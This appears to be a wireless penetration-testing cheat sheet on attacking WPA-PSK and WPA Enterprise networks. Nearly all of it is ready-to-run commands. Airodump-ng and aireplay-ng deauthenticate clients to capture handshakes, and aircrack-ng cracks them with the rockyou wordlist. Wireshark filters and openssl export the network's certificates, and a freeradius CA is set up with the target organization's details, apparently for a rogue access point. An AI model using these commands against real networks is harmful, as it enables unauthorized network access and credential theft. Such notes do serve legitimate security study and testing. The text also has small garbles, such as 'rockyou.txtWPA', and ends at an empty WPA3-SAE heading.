Attacking WPA
WPA/PSK
# Death clients and crack the handshake
sudo airodump-ng –bssid F0:9F:C2:71:22:12 -c 6 -w wpa wlan0mon
sudo aireplay-ng –deauth 0 -a F0:9F:C2:71:22:12 wlan0mon
sudo aircrack-ng wpa.pcap -w rockyou.txtWPA
MGT = WPA Enterprise
# Airodump-ng command and output on channel 3, focused on a BSSID to capture 4-way handshake
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
# Deauthenticating associated client to get the certificate
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 wlan0mon
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# We can add display filters to show the exact frames where the certificate is given (first server, second ca)
# For each certificate, we right click and select Export Packet Bytes to save the data into a file with a .der extension
tls.handshake.type == 11
tls.handshake.certificate
wlan.bssid==E8:9F:80:03:63:4A && eap && tls.handshake.certificate
# Display information about the certificat using openssl (note Subject value)
openssl x509 -inform der -in CERTIFICATE_FILENAME -text
# We can convert the certificat to PEM format (Optional)
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt
# Configuring freeradius & Certificate generation
sudo apt install freeradius
cd /etc/freeradius/3.0/certs
nano ca.cnf
[certificate_authority]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = ca@playtronics.com
commonName = "Playtronics Certificate Authority"
nano server.cnf
[server]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = admin@playtronics.com
commonName = "Playtronics"
rm dh
make destroycerts
make

WPA3-SAE
Last updated